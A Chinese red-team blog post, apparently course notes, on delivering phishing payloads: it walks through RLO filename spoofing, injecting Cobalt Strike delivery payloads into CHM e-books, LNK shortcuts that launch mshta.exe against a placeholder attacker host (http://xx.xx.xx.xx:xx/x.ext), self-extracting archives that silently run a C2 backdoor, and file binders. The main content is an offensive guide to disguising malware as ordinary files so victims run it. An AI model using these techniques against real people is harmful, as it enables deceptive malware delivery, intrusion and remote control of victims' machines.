红队APT-钓鱼投递篇&文件程序类&RLO伪装&LNK快捷&自解压运行&捆绑打包&CHM电子书

Ethan医生5小时前信息收集2

 红队APT-文件后缀-钓鱼伪装-RLO

 红队APT-电子书-CHM-加载JS&PS

 红队APT-快捷方式-LNK-加载&HTA

 红队APT-压缩文件-自解压-释放执行

 红队APT-捆绑文件-打包加载-释放执行

#RLO后缀

命令-插入Unicode字符->RLO模式

 image.png

#CHM电子书

CS生成上线:Attacks——>Web Drive by——>Scripted web Delivery

1、执行JS:见打包资源代码

2、上线JS:见打包资源代码

3、CHM伪装:

找一个正常的CHM电子书,解压后;

将Payload插入其中某个或整个页面;

加载编译,当电子书打开修改页面后上线。

解压命令:hh -decompile .\\html xx.CHM

-bitsadmin 模式

-Powershell 模式

 

#LNK快捷方式:

1、生成:Attacks -> Packages -> Html Application

2、上传:Attacks——>Web Drive by——>Host file

3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext

4、伪装:

-创建快捷方式

image.png

-生成HTA并上传

-属性更改目标执行

-属性更改图标伪装

 

#自解压文件:

安装包&C2后门

1、打包勾选SFX

2、Advanced设置路径

3、Setup设置前后执行

4、Modes设置显示或隐藏

5、Update设置覆盖或更新

6、配合RLO将EXE伪装ZIP压缩

 

#捆绑打包文件:

自带:IExpress

第三方:捆绑器


捆绑比较复杂 因为把正常的程序绑定上去后 会将正常的和后门一起捆绑在一起 导致一起被查杀


相关文章

漏扫项目篇&武装BURP&浏览器插件&信息收集&分析辅助&遥遥领先

#插件类-武装BurpSuite-漏洞检测&分析辅助漏洞检测类:1、FioraNuclei提供Poc图形界面,实现快速搜索、一键运行等功能,提升体验。https://github.com/bi...

漏扫项目篇&Poc开发&Yaml语法&插件一键生成&匹配结果&交互提取

#Nuclei-Poc开发-环境配置&编写流程1、开发环境:Vscode+Yaml插件https://code.visualstudio.com/2、开发文档参考资料:https://docs...

内网对抗-信息收集篇&自动项目&本机导出&外部打点&域内通讯&Pillager&BloodHound

➢ 信息收集-工具项目-本机-Searchall&Pillager➢ 信息收集-工具项目-打点-FScan&Template➢ 信息收集-工具项目-综合-...

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&EwoMail配合Gophish转发&劫持网页

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&EwoMail配合Gophish转发&劫持网页

➢ 红队APT-邮件钓鱼-软硬绕过SPF➢ 红队APT-邮件钓鱼-自建EwoMail➢ 红队APT-邮件钓鱼-Gophish批量域名:xdsec.icu服务器:Cento...

内网对抗-代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

内网对抗-代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

#代理技术-SockS配置-网络不可达-通讯解决解决:信息收集打点和漏洞利用部分注意:配置连接IP为C2服务器IP工具:Proxifier Proxychains等Proxifier使用:直接看课程演...

漏扫项目篇&Poc开发&Rule语法&反链判断&不回显检测&Yaml生成

#Xray-Poc开发-数据回显&RCE不回显&实验室1、开发参考:https://poc.xray.cool/https://docs.xray.cool/#/guide/READM...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。